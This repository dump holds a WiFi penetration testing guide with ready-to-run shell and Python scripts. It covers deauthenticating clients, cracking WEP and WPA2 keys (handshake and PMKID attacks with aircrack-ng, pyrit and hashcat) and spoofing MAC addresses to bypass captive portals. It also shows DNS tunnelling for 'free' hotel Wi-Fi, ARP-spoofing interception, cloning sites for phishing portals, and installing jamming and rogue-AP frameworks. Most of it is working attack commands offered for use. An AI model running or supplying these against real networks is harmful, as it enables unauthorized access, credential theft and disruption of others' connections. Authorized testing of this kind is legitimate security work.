├── scripts
├── open
│ ├── start_ettercap.sh
│ ├── start_wireshark.sh
│ ├── iodine_client.sh
│ ├── iodine_server.sh
│ ├── get_mac_ip.sh
│ ├── change_mac_ip.sh
│ ├── get_mac_ip.py
│ ├── README.md
│ └── change_mac_ip.py
├── wep
│ ├── wep_crack.sh
│ ├── wep_attack.sh
│ ├── wep_monitor.sh
│ └── README.md
├── wpa
│ ├── wpa_crack.sh
│ ├── wpa_attack.sh
│ ├── wpa_monitor.sh
│ ├── wpa_pyrit.sh
│ ├── pmkid_install.sh
│ ├── pmkid.sh
│ ├── README.md
│ └── py_pmkid.py
├── basic_commands
│ ├── monitor.sh
│ ├── airodump.sh
│ └── README.md
├── other_frameworks
│ ├── README.md
│ └── install.sh
└── README.md
└── README.md
/scripts/open/start_ettercap.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | sudo ettercap -G
3 |
--------------------------------------------------------------------------------
/scripts/open/start_wireshark.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | sudo wireshark &
3 |
--------------------------------------------------------------------------------
/scripts/wep/wep_crack.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | aircrack-ng $PCAP_FILE
3 |
4 |
--------------------------------------------------------------------------------
/scripts/wpa/wpa_crack.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | aircrack-ng $PCAP_FILE
3 |
4 |
--------------------------------------------------------------------------------
/scripts/open/iodine_client.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | iodine -f -P $1 $2 $3
3 |
4 |
--------------------------------------------------------------------------------
/scripts/wpa/wpa_attack.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | aireplay-ng -0 1 -a $2 -c $3 $1
3 |
4 |
--------------------------------------------------------------------------------
/scripts/open/iodine_server.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | iodined -f -c -P $1 -n $2 10.0.0.1 $3
3 |
4 |
--------------------------------------------------------------------------------
/scripts/wep/wep_attack.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | aireplay-ng -1 0 -a $2 -h $3 $1
3 | aireplay-ng -3 -b $2 -h $3 $1
4 | aireplay-ng -0 1 -a $2 -c $4 $1
5 |
--------------------------------------------------------------------------------
/scripts/basic_commands/monitor.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | IFACE='$1'
4 | airmon-ng check kill
5 | ifconfig $IFACE down
6 | iwconfig $IFACE mode monitor
7 | ifconfig $IFACE up
--------------------------------------------------------------------------------
/scripts/open/get_mac_ip.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | $NETWORK="$1"
4 | nmap -sP $NETWORK | grep -v "Host" | tail -n +3 | tr '\n' ' ' | sed 's|Nmap|\nNmap|g' | grep "MAC Address" | cut -d " " -f5,8
--------------------------------------------------------------------------------
/scripts/wep/wep_monitor.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | IFACE='$1'
4 | airmon-ng check kill
5 | ifconfig $IFACE down
6 | iwconfig $IFACE mode monitor
7 | ifconfig $IFACE up
8 | airodump-ng $IFACE -w $2
--------------------------------------------------------------------------------
/scripts/basic_commands/airodump.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | IFACE='$1'
4 | airmon-ng check kill
5 | ifconfig $IFACE down
6 | iwconfig $IFACE mode monitor
7 | ifconfig $IFACE up
8 | airodump-ng $IFACE
--------------------------------------------------------------------------------
/scripts/other_frameworks/README.md:
--------------------------------------------------------------------------------
1 | # Other frameworks
2 |
3 | Script to download and install:
4 | - wifiphisher
5 | - wifijammer
6 | - SniffAir
7 | - WiFi-Pumpkin
8 | - eaphammer
9 |
10 |
--------------------------------------------------------------------------------
/scripts/wpa/wpa_monitor.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | IFACE='wlan0'
4 | airmon-ng check kill
5 | ifconfig $IFACE down
6 | iwconfig $IFACE mode monitor
7 | ifconfig $IFACE up
8 | airodump-ng $IFACE -w $2
--------------------------------------------------------------------------------
/scripts/wpa/wpa_pyrit.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | pyrit -r $1 analyze
3 | pyrit -r $1 -o clean_$1 strip
4 | pyrit -i $WORDLIST import_passwords
5 | pyrit eval
6 | pyrit batch
7 | pyrit -r clean_$1 attack_db
8 |
--------------------------------------------------------------------------------
/scripts/wpa/pmkid_install.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | git clone https://github.com/ZerBea/hcxdumptool.git
4 | cd hcxdumptool && make && make install && cd ..
5 | git clone https://github.com/ZerBea/hcxtools.git
6 | cd hcxtools && make && make install && cd ..
7 |
--------------------------------------------------------------------------------
/scripts/basic_commands/README.md:
--------------------------------------------------------------------------------
1 | ## Basic commands
2 |
3 | - *monitor.sh* - Set monitor mode in a wireless interface
4 |
5 | ```
6 | sh monitor.sh $INTERFACE
7 | ```
8 |
9 | - *airodump.sh* - Set monitor mode and run Airodump in a wireless interface
10 |
11 | ```
12 | sh airodump.sh $INTERFACE
13 | ```
--------------------------------------------------------------------------------
/scripts/open/change_mac_ip.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | IFACE=$1
4 | IP=$2
5 | GW=$3
6 | MAC=$4
7 |
8 | ip link set $IFACE down
9 | ip link set dev $IFACE address $MAC
10 | ip link set $IFACE up
11 | ip addr flush dev $IFACE
12 |
13 | ifconfig $IFACE $IP netmask 255.255.255.0 up
14 | route add default gw $GW
15 |
16 | echo "New IP: $IP"
17 | echo "New MAC: $MAC"
18 | echo
19 |
20 | iwconfig $IFACE
21 | ifconfig $IFACE
22 |
--------------------------------------------------------------------------------
/scripts/wep/README.md:
--------------------------------------------------------------------------------
1 | ## WEP
2 |
3 | - *wep_monitor.sh* - Set monitor mode and start monitoring networks
4 |
5 | ```
6 | sh wep_monitor.sh $INTERFACE $PCAP_NAME
7 | ```
8 |
9 | - *wep_attack.sh* - Attack the network. Get around 100.000 IVs
10 |
11 | ```
12 | sh wep_attack.sh $INTERFACE $AP_NAME $AP_MAC $CLIENT_MAC
13 | ```
14 |
15 | - *wep_crack.sh* - Crack password from the pcap file
16 |
17 | ```
18 | sh wep_crack.sh $PCAP_NAME
--------------------------------------------------------------------------------
/scripts/other_frameworks/install.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 | sudo apt-get install aircrack-ng httrack ettercap iodine wireshark
3 | mkdir other_frameworks && cd other_frameworks
4 | git clone https://github.com/wifiphisher/wifiphisher && cd wifiphisher && sudo python setup.py install && cd ..
5 | git clone https://github.com/DanMcInerney/wifijammer && cd wifijammer && sudo python setup.py install && cd ..
6 | git clone https://github.com/Tylous/SniffAir && cd SniffAir && sudo ./setup.sh && cd ..
7 | git clone https://github.com/P0cL4bs/WiFi-Pumpkin && cd WiFi-Pumpkin && sudo ./installer.sh --install && cd ..
8 | git clone https://github.com/s0lst1c3/eaphammer && cd eaphammer && sudo ./kali-setup && cd ..
9 | cd ..
10 |
--------------------------------------------------------------------------------
/scripts/wpa/pmkid.sh:
--------------------------------------------------------------------------------
1 | #!/sh
2 |
3 | MAC='$1'
4 | WORDLIST='$2'
5 | FILTER_FILE='filter.txt'
6 | PCAPNG_FILE='temp.pcapng'
7 | HASH_FILE='temp_hash'
8 |
9 | if [ ! -d hcxdumptool]; then
10 | git clone https://github.com/ZerBea/hcxdumptool.git
11 | cd hcxdumptool && make && make install && cd ..
12 | fi
13 | if [ ! -d hcxtools]; then
14 | git clone https://github.com/ZerBea/hcxtools.git
15 | cd hcxtools && make && make install && cd ..
16 | fi
17 | echo $MAC | sed 's/://g' > $FILTER_FILE
18 | hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable__status=1 --filterlist=$FILTER_FILE --filtermode=2
19 | hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
20 | hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
--------------------------------------------------------------------------------
/scripts/open/get_mac_ip.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import argparse as arg
3 | import nmap
4 |
5 | parser = arg.ArgumentParser()
6 | parser.add_argument("-i", "--interface", help="Interface", required=True)
7 | parser.add_argument("-a", "--address", help="IP address", required=True)
8 | argument = parser.parse_args()
9 |
10 |
11 | def scan_mac(ip, iface='wlan0'):
12 | dict_ = []
13 | scan = nmap.PortScanner().scan(hosts=ip + '/24',arguments='-sP '+ iface, sudo=True).get('scan')
14 | for i in scan.keys():
15 | mac = scan.get(scan.keys()[scan.keys().index(i)]).get('addresses').get('mac')
16 | dict_.append({'ip':i, 'mac':mac})
17 | return dict_
18 |
19 |
20 | def main():
21 | res = scan_mac(argument.address, argument.interface)
22 | for j in sorted(res, key = lambda i: i['ip']):
23 | print j
24 |
25 |
26 | main()
--------------------------------------------------------------------------------
/scripts/wpa/README.md:
--------------------------------------------------------------------------------
1 | ## WPA
2 |
3 | - *wpa_monitor.sh* - Set monitor mode and start monitoring networks
4 |
5 | ```
6 | sh wpa_monitor.sh $INTERFACE $PCAP_NAME
7 | ```
8 |
9 | - *wpa_attack.sh* - Deauthenticate a client to get a 4-way handshake to crack
10 |
11 | ```
12 | sh wpa_attack.sh $INTERFACE $AP_MAC $CLIENT_MAC
13 | ```
14 |
15 | - *wpa_crack.sh* - Crack the pcap file using Aircrack-ng
16 |
17 | ```
18 | sh wpa_crack.sh $PCAP_NAME
19 | ```
20 |
21 | - *wpa_pyrit.sh* - Crack the pcap file using Pyrit
22 |
23 | ```
24 | sh wpa_pyrit.sh $PCAP_NAME
25 | ```
26 |
27 | - *pmkid_install.sh* - Install the needed dependencies for the PMKID attack
28 |
29 | ```
30 | sh pmkid_install.sh
31 | ```
32 |
33 | - *pmkid.sh* - Run the PMKID attack
34 |
35 | ```
36 | sh pmkid.sh $MAC_ADDRESS $DICTIONARY
37 | ```
38 |
39 | - *py_pmkid.py* - Run the PMKID attack
40 |
41 | ```
42 | python py_pmkid.py [-h] [-f FILTER_FILE] [-p PCAP_FILE] [-j HASH_FILE] -d DICTIONARY -i MON_INTERFACE -m MAC_ADDRESS
43 | ```
--------------------------------------------------------------------------------
/scripts/open/README.md:
--------------------------------------------------------------------------------
1 | ## Open networks
2 |
3 | - *change_mac_ip.py* - Scan the IP and MAC addresses of your network and change to those IP and MAC addresses -
4 |
5 | ```
6 | python change_mac_ip.py [-h] -a ADDRESS -i INTERFACE
7 | ```
8 |
9 | - *change_mac_ip.sh* - Change IP and MAC address of an interface to specific values
10 |
11 | ```
12 | sh change_mac_ip.sh $INTERFACE $IP_ADDRESS $GATEWAY $MAC_ADRESS
13 | ```
14 |
15 | - *get_mac_ip.py* - List IP and MAC addresses of devices in your network
16 |
17 | ```
18 | python get_mac_ip.py [-h] -i INTERFACE -a ADDRESS
19 | ```
20 |
21 | - *get_mac_ip.sh* - List IP and MAC addresses of devices in your network
22 |
23 | ```
24 | sh get_mac_ip.sh $NETWORK
25 | ```
26 |
27 | Example: *sh get_mac_ip.sh 192.168.79.0/24*
28 |
29 |
30 | - *iodine_server.sh* - Start Iodine server
31 |
32 | ```
33 | sh iodine_server.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
34 | ```
35 |
36 | - *iodine_client.sh* - Connect to Iodine server
37 |
38 | ```
39 | sh iodine_client.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
40 | ```
41 |
42 | - *start_ettercap.sh* - Run ettercap in graphical mode
43 |
44 | ```
45 | sh start_ettercap.sh
46 | ```
47 |
48 | - *start_wireshark.sh* - Run wireshark
49 |
50 | ```
51 | sh start_wireshark.sh
52 | ```
53 |
--------------------------------------------------------------------------------
/scripts/wpa/py_pmkid.py:
--------------------------------------------------------------------------------
1 | import os, sys
2 | import argparse
3 |
4 | def get_args():
5 | parser = argparse.ArgumentParser()
6 | parser.add_argument('-f', '--filter_file', required=False, action='store', help='FIlter file name', default="filtermac.txt")
7 | parser.add_argument('-p', '--pcap_file', required=False, action='store', help='Pcap file name', default="output.pcapng")
8 | parser.add_argument('-j', '--hash_file', required=False, action='store', help='Hash file name', default = "PMKID-hash")
9 | parser.add_argument('-d', '--dictionary', required=True, action='store', help='Dictionary', default="rockyou.txt")
10 | parser.add_argument('-i', '--mon_interface', required=True, action='store', help='Interface in monitor mode', default = "mon0")
11 | parser.add_argument('-m', '--mac', required=True, action='store', help='MAC')
12 | my_args = parser.parse_args()
13 | return my_args
14 |
15 | args = get_args()
16 | filter_file = args.filter_file
17 | pcapng_file = args.pcap_file
18 | hash_file = args.hash_file
19 | dicc_wpa = args.mon_interface
20 | iface = args.mon_interface
21 | mac = args.mac.replace(":","")
22 |
23 | # Create filter file
24 | os.system("echo "+mac+" > "+filter_file)
25 |
26 | # Capturar PMKID
27 | print("Do not stop the capture until you see [FOUND PMKID]")
28 | os.system("hcxdumptool -i "+iface+" -o "+pcapng_file+" --enable_status=1 --filterlist="+filter_file+" --filtermode=2")
29 |
30 | # Extraer hash
31 | os.system("hcxpcaptool -z "+hash_file+" "+pcapng_file)
32 |
33 | # Fuerza bruta
34 | os.system("hashcat -a 0 -m 16800 "+hash_file+" "+dicc_wpa+" --force")
35 |
--------------------------------------------------------------------------------
/scripts/open/change_mac_ip.py:
--------------------------------------------------------------------------------
1 | import sys,os
2 | import argparse as arg
3 | import nmap
4 | import urllib2
5 |
6 | parser = arg.ArgumentParser()
7 | parser.add_argument("-a", "--address", help="IP address", required=True)
8 | parser.add_argument("-i", "--interface", help="Interface", required=True)
9 | argument = parser.parse_args()
10 |
11 |
12 | def scan_(ip):
13 | dict_ = []
14 | scan = nmap.PortScanner().scan(hosts=ip + '/24',arguments='-sn ', sudo=True).get('scan')
15 | for i in scan.keys():
16 | mac = scan.get(scan.keys()[scan.keys().index(i)]).get('addresses').get('mac')
17 | dict_.append({'ip':i, 'mac':mac})
18 | return dict_
19 |
20 | def change(ip,mac,iface):
21 | if mac is not None:
22 | gw_arr = ip.split(".")
23 | gw_arr[3] = "1"
24 | gw_address = ".".join(gw_arr)
25 |
26 | os.system("ip link set "+iface+" down")
27 | os.system("ip link set dev "+iface+" address "+mac)
28 | os.system("ip link set "+iface+" up")
29 | os.system("ip addr flush dev "+iface)
30 | os.system("ifconfig "+iface+" "+ip+" netmask 255.255.255.0 up")
31 | os.system("route add default gw "+gw_address)
32 |
33 | print ("Testing IP %s and MAC %s"%(ip,mac))
34 | os.system("ping -c 2 8.8.8.8")
35 | try:
36 | urllib2.urlopen('http://216.58.192.142', timeout=1)
37 | return True
38 | except:
39 | return False
40 |
41 |
42 | def main():
43 | res = scan_(argument.address)
44 | print "IP and Mac list"
45 | for j in sorted(res, key = lambda i: i['ip']):
46 | print ("IP :%s / MAC: %s"%(j['ip'],j['mac']))
47 | for j in sorted(res, key = lambda i: i['ip']):
48 | internet_connection = change(j['ip'],j['mac'],argument.interface)
49 | if internet_connection:
50 | break
51 |
52 | main()
53 |
--------------------------------------------------------------------------------
/scripts/README.md:
--------------------------------------------------------------------------------
1 | # Scripts
2 |
3 | ## Basic commands
4 |
5 | - *monitor.sh* - Set monitor mode in a wireless interface
6 |
7 | ```
8 | sh monitor.sh $INTERFACE
9 | ```
10 |
11 | - *airodump.sh* - Set monitor mode and run Airodump in a wireless interface
12 |
13 | ```
14 | sh airodump.sh $INTERFACE
15 | ```
16 |
17 |
18 | ## Open networks
19 |
20 | - *change_mac_ip.py* - Scan the IP and MAC addresses of your network and change to those IP and MAC addresses -
21 |
22 | ```
23 | python change_mac_ip.py [-h] -a ADDRESS -i INTERFACE
24 | ```
25 |
26 | - *change_mac_ip.sh* - Change IP and MAC address of an interface to specific values
27 |
28 | ```
29 | sh change_mac_ip.sh $INTERFACE $IP_ADDRESS $GATEWAY $MAC_ADRESS
30 | ```
31 |
32 | - *get_mac_ip.py* - List IP and MAC addresses of devices in your network
33 |
34 | ```
35 | python get_mac_ip.py [-h] -i INTERFACE -a ADDRESS
36 | ```
37 |
38 | - *get_mac_ip.sh* - List IP and MAC addresses of devices in your network
39 |
40 | ```
41 | sh get_mac_ip.sh $NETWORK
42 | ```
43 |
44 | Example: *sh get_mac_ip.sh 192.168.79.0/24*
45 |
46 |
47 | - *iodine_server.sh* - Start Iodine server
48 |
49 | ```
50 | sh iodine_server.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
51 | ```
52 |
53 | - *iodine_client.sh* - Connect to Iodine server
54 |
55 | ```
56 | sh iodine_client.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
57 | ```
58 |
59 | - *start_ettercap.sh* - Run ettercap in graphical mode
60 |
61 | ```
62 | sh start_ettercap.sh
63 | ```
64 |
65 | - *start_wireshark.sh* - Run wireshark
66 |
67 | ```
68 | sh start_wireshark.sh
69 | ```
70 |
71 |
72 | # Other frameworks
73 |
74 | Script to download and install:
75 | - wifiphisher
76 | - wifijammer
77 | - SniffAir
78 | - WiFi-Pumpkin
79 | - eaphammer
80 |
81 |
82 | ## WEP
83 |
84 | - *wep_monitor.sh* - Set monitor mode and start monitoring networks
85 |
86 | ```
87 | sh wep_monitor.sh $INTERFACE $PCAP_NAME
88 | ```
89 |
90 | - *wep_attack.sh* - Attack the network. Get around 100.000 IVs
91 |
92 | ```
93 | sh wep_attack.sh $INTERFACE $AP_NAME $AP_MAC $CLIENT_MAC
94 | ```
95 |
96 | - *wep_crack.sh* - Crack password from the pcap file
97 |
98 | ```
99 | sh wep_crack.sh $PCAP_NAME
100 | ```
101 |
102 |
103 | ## WPA
104 |
105 | - *wpa_monitor.sh* - Set monitor mode and start monitoring networks
106 |
107 | ```
108 | sh wpa_monitor.sh $INTERFACE $PCAP_NAME
109 | ```
110 |
111 | - *wpa_attack.sh* - Deauthenticate a client to get a 4-way handshake to crack
112 |
113 | ```
114 | sh wpa_attack.sh $INTERFACE $AP_MAC $CLIENT_MAC
115 | ```
116 |
117 | - *wpa_crack.sh* - Crack the pcap file using Aircrack-ng
118 |
119 | ```
120 | sh wpa_crack.sh $PCAP_NAME
121 | ```
122 |
123 | - *wpa_pyrit.sh* - Crack the pcap file using Pyrit
124 |
125 | ```
126 | sh wpa_pyrit.sh $PCAP_NAME
127 | ```
128 |
129 | - *pmkid_install.sh* - Install the needed dependencies for the PMKID attack
130 |
131 | ```
132 | sh pmkid_install.sh
133 | ```
134 |
135 | - *pmkid.sh* - Run the PMKID attack
136 |
137 | ```
138 | sh pmkid.sh $MAC_ADDRESS $DICTIONARY
139 | ```
140 |
141 | - *py_pmkid.py* - Run the PMKID attack
142 |
143 | ```
144 | python py_pmkid.py [-h] [-f FILTER_FILE] [-p PCAP_FILE] [-j HASH_FILE] -d DICTIONARY -i MON_INTERFACE -m MAC_ADDRESS
145 | ```
146 |
147 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WiFi Penetration Testing Guide
2 |
3 | ## Index
4 |
5 | 1. [Basic commands](#1)
6 |
7 | 2. [Open networks](#2)
8 |
9 | 2.1. [Captive portals](#21)
10 |
11 | 2.2. [Man in the Middle attack](#22)
12 |
13 | 3. [WEP cracking](#3)
14 |
15 | 3.1. [No clients](#31)
16 |
17 | 4. [WPA2-PSK cracking](#4)
18 |
19 | 4.1. [Cracking the 4-way-handshake](#41)
20 |
21 | 4.2. [PMKID attack](#42)
22 |
23 | 4.3. [AP-less attack](#43)
24 |
25 | 5. [WPA2-Enterprise](#5)
26 |
27 | 5.1. [Fake Access Points](#51)
28 |
29 | 5.2. [Brute force](#52)
30 |
31 | 5.3. [EAP methods supported](#53)
32 |
33 | 6. [Other attacks](#6)
34 |
35 | 6.1. [Krack Attack and Frag Attack](#61)
36 |
37 | 6.2. [OSINT](#62)
38 |
39 | 6.3. [Wifi Jamming](#63)
40 |
41 | 6.4. [Other frameworks](#64)
42 |
43 | 7. [Post-exploitation](#7)
44 |
45 | 7.1. [Attacking the router](#71)
46 |
47 | 7.2. [Types of scanners](#72)
48 |
49 | 7.3. [Spoofing](#73)
50 |
51 | -------------------------
52 |
53 |
54 |
55 | # 1. Basic commands
56 |
57 |
58 | #### Set environment variable
59 |
60 | ```bash
61 | VARIABLE=value
62 | ```
63 |
64 | #### Check interface mode
65 |
66 | ```bash
67 | iwconfig $IFACE
68 | ```
69 |
70 | #### Check interface status
71 |
72 | ```bash
73 | ifconfig $IFACE
74 | ```
75 |
76 | #### Set monitor mode
77 |
78 | ```
79 | airmon-ng check kill
80 | ifconfig $IFACE down
81 | iwconfig $IFACE mode monitor
82 | ifconfig $IFACE up
83 | ```
84 |
85 |
86 | #### List networks
87 |
88 | 1. Set monitor mode
89 |
90 | 2. Run Airodump-ng-ng
91 |
92 | ```bash
93 | airodump-ng $IFACE -c $CHANNEL -e $ESSID
94 | ```
95 |
96 |
97 | #### Deauthentication
98 |
99 | 1. Only one client
100 |
101 | ```bash
102 | aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
103 | ```
104 |
105 | 2. An Access Point (= all the clients in the AP)
106 |
107 | ```bash
108 | aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
109 | ```
110 |
111 | #### Get hidden SSID with clients
112 |
113 | 1. List networks
114 |
115 | List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
116 |
117 | 2. Deauthenticate
118 |
119 | In another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:
120 |
121 | ```bash
122 | aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
123 | ```
124 |
125 | #### Get hidden SSID without clients
126 |
127 | 1. List networks
128 |
129 | List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
130 |
131 | 2.a. Execute a dictionary attack
132 |
133 | ```
134 | mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
135 | ```
136 |
137 | 2.b. Or execute a bruteforce attack
138 |
139 | ```
140 | mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET
141 | ```
142 |
143 | For the character set it is possible to use *l* (lowercase letters), *u* (uppercase letters), *n* (numbers), *c* (lowercase+uppercase), *m* (lowercase+uppercase+numbers) or *a* (all printed).
144 |
145 | -------------------------
146 |
147 |
148 |
149 | # 2. Open networks
150 |
151 | ## 2.1. Captive portals
152 |
153 | ### 2.1.1. Fake captive portals
154 |
155 |
156 | 1. Clone a website using [HTTrack](https://www.httrack.com/)
157 |
158 | 2. Install [Wifiphiser](https://github.com/wifiphisher/wifiphisher). Add the HTTrack result in a new folder in *wifiphisher/data/phishing-pages/*new_page*/html* and a configuration file in *wifiphisher/data/phishing-pages/*new_page*/config.ini*.
159 |
160 | 3. Recompile the project using *python setup.py install* or the binary in *bin*.
161 |
162 | 4. This command works correctly in the latest Kali release after installing hostapd:
163 |
164 | ```
165 | cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
166 | ```
167 |
168 |
169 |
170 | ### 2.1.2. Bypass 1: MAC spoofing
171 |
172 | The first method to bypass a captive portal is to change your MAC address to one of an already authenticated user
173 |
174 | 1. Scan the network and get the list of IP and MAC addresses. You can use:
175 |
176 | - nmap
177 |
178 | - A custom script like [this](scripts/open/get_mac_ip.sh) (Bash) or [this](scripts/open/get_mac_ip.py) (Python)
179 |
180 | 2. Change your IP and MAC addresses. You can use:
181 |
182 | - macchanger
183 |
184 | - A custom script like [this](scripts/open/change_mac_ip.sh)(Bash)
185 |
186 |
187 | Also, you can use scripts to automate the process like:
188 |
189 | - [Poliva script](https://raw.githubusercontent.com/poliva/random-scripts/master/wifi/hotspot-bypass.sh)
190 |
191 | - [Hackcaptiveportals](https://github.com/systematicat/hack-captive-portals)
192 |
193 |
194 |
195 | ### 2.1.3. Bypass 2: DNS tunnelling
196 |
197 | A second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get "free" Wifi in hotel, airports...
198 |
199 |
200 | 1. Check the domain names are resolved:
201 |
202 | ```
203 | nslookup example.com
204 | ```
205 |
206 | 2. Create 2 DNS records (in [Digital ocean](https://www.digitalocean.com/), [Afraid.org](http://freedns.afraid.org/)...):
207 |
208 | - One "A record": dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)
209 |
210 | - One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)
211 |
212 |
213 | 3. Execution in the server
214 |
215 | ```
216 | iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
217 | ```
218 |
219 | 4. Check if it works correctly in [here](https://code.kryo.se/iodine/check-it/)
220 |
221 |
222 | 5. Execution in the client
223 |
224 | ```
225 | iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
226 | ```
227 |
228 | 6. Create the tunnel
229 |
230 | ```
231 | ssh -D 8080 $USER@10.0.0.1
232 | ```
233 |
234 |
235 |
236 | ## 2.2. Man in the Middle attack
237 |
238 | Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.
239 |
240 | 1. ARP Spoofing attack using [Ettercap](https://www.ettercap-project.org/)
241 |
242 | 2. Sniff the traffic using Wireshark or TCPdump
243 |
244 | 3. Analyze the traffic using [PCredz](https://github.com/lgandx/PCredz) (Linux) or [Network Miner](https://www.netresec.com/?page=networkminer) (Windows)
245 |
246 | -------------------------
247 |
248 |
249 |
250 | # 3. WEP cracking
251 |
252 | 1. Start capture
253 | ```bash
254 | airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
255 | ```
256 |
257 |
258 | 2. Accelerate the IV capture using *Fake authentication* + *Arp Request Replay Attack* + *Deauthenticate user*. Stop Airodump at ~100.000 different IVs
259 |
260 | ```bash
261 | aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
262 | aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
263 | aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
264 | ```
265 |
266 | 3. Crack the password using Aircrack-ng
267 | ```bash
268 | aircrack-ng $PCAP_FILE
269 | ```
270 |
271 |
272 | -------------------------
273 |
274 |
275 |
276 |
277 | # 4. WPA2-PSK cracking
278 |
279 | ## 4.1. Cracking the 4-way-handshake
280 |
281 | 1. Start capture
282 |
283 | ```bash
284 | airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
285 | ```
286 |
287 | 2. Deauthenticate an user. Stop airodump capture when you see a message 'WPA handshake: $MAC'
288 |
289 | ```bash
290 | aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
291 | ```
292 |
293 | 3. Option 1: Crack the handshake using Aircrack-ng
294 |
295 | ```bash
296 | aircrack-ng -w $WORDLIST capture.cap
297 | ```
298 |
299 | You can get wordlists from [here](https://github.com/kennyn510/wpa2-wordlists).
300 |
301 | 4. Option 2: Crack the handshake using Pyrit
302 |
303 | ```
304 | pyrit -r $PCAP_FILE analyze
305 | pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
306 | pyrit -i $WORDLIST import_passwords
307 | pyrit eval
308 | pyrit batch
309 | pyrit -r $CLEAN_PCAP_FILE attack_db
310 | ```
311 |
312 |
313 |
314 | ## 4.2. PMKID attack
315 |
316 | You can use [this script](scripts/wpa/pmkid.sh) or follow these steps:
317 |
318 | 1. Install Hcxdumptool and Hcxtool (you can use this [script](scripts/wpa/pmkid_install.sh)).
319 |
320 | 2. Stop Network Manager
321 |
322 | ```bash
323 | airmon-ng check kill
324 | ```
325 |
326 |
327 |
328 | 3a. If you want to attack a specific MAC address
329 |
330 | - Create a text file ($FILTER_FILE) and add the MAC address without ":". You can use *sed* and redirect the output to a file:
331 |
332 | ```
333 | echo $MAC | sed 's/://g' > $FILTER_FILE
334 | ```
335 |
336 | - Capture PMKID
337 |
338 | ```bash
339 | hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
340 | ```
341 |
342 | 4. Create $HASH_FILE
343 |
344 | ```bash
345 | hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
346 | ```
347 |
348 | The structure of each line is: PMKID * ROUTER MAC * STATION * ESSID (check at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
349 |
350 | 5. Crack it using Hashcat (option 16800)
351 |
352 | ```bash
353 | hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
354 | ```
355 |
356 |
357 |
358 | ## 4.3. AP-less attack
359 |
360 | If you have access to a client device with the Wifi connection turned on but there is not a network around, you can still attack that network if the client devices has previously connected to it.
361 |
362 | For that, you have to create a Fake Access Point using hostpad with a configuration file like [this one](https://gist.github.com/nickpegg/059ad1e0a0a14671892e), with any password but the same network name. Create the fake network, the client device will try to connect to it and you get the 4-way handshake as in the [4.1 section in this guide](#41).
363 |
364 |
365 | -------------------------
366 |
367 |
368 |
369 | # 5. WPA2-Enterprise
370 |
371 | ## 5.1 Fake Access Points
372 |
373 | ### Virtual machines download
374 |
375 | | Operating system | Platform | Credentials | Size | Link |
376 | | ---------------- | -------- | ----------- | ---- | ---- |
377 | | Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | [MEGA](https://mega.nz/file/5glEzKKa#SCmh95KdM28uPt-h8J5xtu4pQrnn_3yrI2kLnaSq3nw) |
378 | | Kali 2019.1 | VMware | root:wifi | 4.99 GB | [MEGA](https://mega.nz/file/11sDVSoB#KMq5yWvuGUFwGhqzd-5hE21Xsfxsp0UMauQKntMbs38) |
